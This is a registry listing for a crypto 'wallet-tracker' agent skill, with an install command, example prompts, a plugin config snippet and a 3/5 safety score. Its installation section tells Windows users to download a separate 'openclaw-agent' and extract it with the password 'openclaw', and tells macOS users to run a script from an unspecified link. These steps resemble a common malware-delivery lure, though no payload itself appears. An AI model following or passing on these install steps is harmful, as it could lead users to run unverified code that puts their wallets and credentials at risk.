ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Use the OpenClaw wallet-tracker skill to monitor whale movements, track ERC-20 and Solana transactions, and analyze portfolio changes with automated, real-time alerts.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-oozrx
Or

What This Skill Does

The wallet-tracker skill provides a robust framework for monitoring blockchain activity across Ethereum and Solana ecosystems in real-time. By leveraging the openclaw-agent utility, it enables users to observe whale movements, track significant portfolio changes, and receive automated updates on token transfers or NFT interactions. This skill acts as a bridge between blockchain explorers and your local terminal, facilitating programmatic analysis of decentralized finance (DeFi) interactions and on-chain movements.

Installation

To begin, ensure you have the OpenClaw agent installed. Run clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-oozrx in your terminal. For Windows users, download the openclaw-agent utility and extract it with the password 'openclaw'. macOS users must execute the installation script provided via the source snippet link. The agent must be running in the background for tracking tasks to succeed.

Use Cases

Wallet-tracker is ideal for decentralized finance enthusiasts, developers auditing smart contracts, and professional traders. You can use it to monitor the "smart money" (whales) to identify early entry points into new projects. Developers can use it to verify successful execution of transaction logic, while NFT collectors can track provenance and movement of specific assets across digital wallets. It is particularly effective for real-time portfolio management.

Example Prompts

  1. "Track 0x742d35Cc6634C0532925a3b844Bc454e4438f44e and alert me whenever a transaction exceeds 10 ETH."
  2. "Watch this Solana address and output the last 10 signature hashes to my dashboard every 60 seconds."
  3. "Show me the recent history of ERC-20 token transfers for my monitored portfolio to ensure all staking rewards have arrived."

Tips & Limitations

Always ensure your API keys (e.g., Etherscan) are correctly configured in your environment variables to avoid rate limiting. Because this skill relies on external node providers and RPC endpoints, latency may vary during periods of high network congestion. Keep in mind that privacy-focused wallets or mixers may obscure transaction details. For critical alerts, we recommend implementing custom filtering logic within the Python script provided in the technical documentation to filter out noise from low-value automated dust transfers.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-oozrx": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#defi#web3#monitoring#crypto
Safety Score: 3/5

Flags: network-access, external-api, code-execution